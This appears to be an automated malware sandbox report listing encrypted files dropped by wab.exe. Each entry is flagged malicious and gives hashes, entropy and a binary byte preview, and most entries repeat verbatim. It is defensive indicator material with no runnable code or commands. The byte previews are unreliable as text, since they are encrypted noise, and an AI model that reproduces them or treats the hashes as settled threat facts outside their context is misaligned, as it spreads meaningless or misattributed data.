                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):190991
                                                                                          Entropy (8bit):7.999083282581577
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:Lv+ThFGkSwGqBbSbhbRfOOp+vB8gPLhF2nBWTk3SBER1jAPfZMz6VrAsZiXPuGIx:yF58qB2tbZby862E+giCZC6Vt42lmEcq
                                                                                          MD5:FDE5FF01917FC57CA0605F922C816678
                                                                                          SHA1:FAA41F59F5AAC0B53A4248D7822362C6363DC075
                                                                                          SHA-256:73F031CFDE95F99B0A49C4D21B3251117EA3FC46046167ED9D324489648A1E45
                                                                                          SHA-512:0052E43DB2657B230F5DC0EA07B7E9AE032992DF42B98F5C07DAEED0012346B272F7123E08EA4605156803BA3EA5246F3907D21506AD01AA1896432632C13E34
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):193368
                                                                                          Entropy (8bit):7.99909450421486
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMZyUzNADLQBCQQ+ofc2+25K4k2sZKgmXw3uFwMAQfMABjjo7Y8:LURqd+McXDdDZuFwi5Bjjo77
                                                                                          MD5:DB2D3EB11861F25E3965CF95D4615A40
                                                                                          SHA1:AE4B20FDDB1751A27DA0215022BC498D4364519B
                                                                                          SHA-256:59C430D63B7A2026A92AFCE32D765D9583A7F10D6D749106D2FA7246CFA9DC56
                                                                                          SHA-512:97D6274E8FAB52283104566F5C39FF35F625686BC889BCA0D26732FF125E8CE68370835D2A4B972D22A49A3F2451711A9ABBB002CFC641D5354CAE682DA81A96
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):193368
                                                                                          Entropy (8bit):7.99909450421486
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMZyUzNADLQBCQQ+ofc2+25K4k2sZKgmXw3uFwMAQfMABjjo7Y8:LURqd+McXDdDZuFwi5Bjjo77
                                                                                          MD5:DB2D3EB11861F25E3965CF95D4615A40
                                                                                          SHA1:AE4B20FDDB1751A27DA0215022BC498D4364519B
                                                                                          SHA-256:59C430D63B7A2026A92AFCE32D765D9583A7F10D6D749106D2FA7246CFA9DC56
                                                                                          SHA-512:97D6274E8FAB52283104566F5C39FF35F625686BC889BCA0D26732FF125E8CE68370835D2A4B972D22A49A3F2451711A9ABBB002CFC641D5354CAE682DA81A96
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
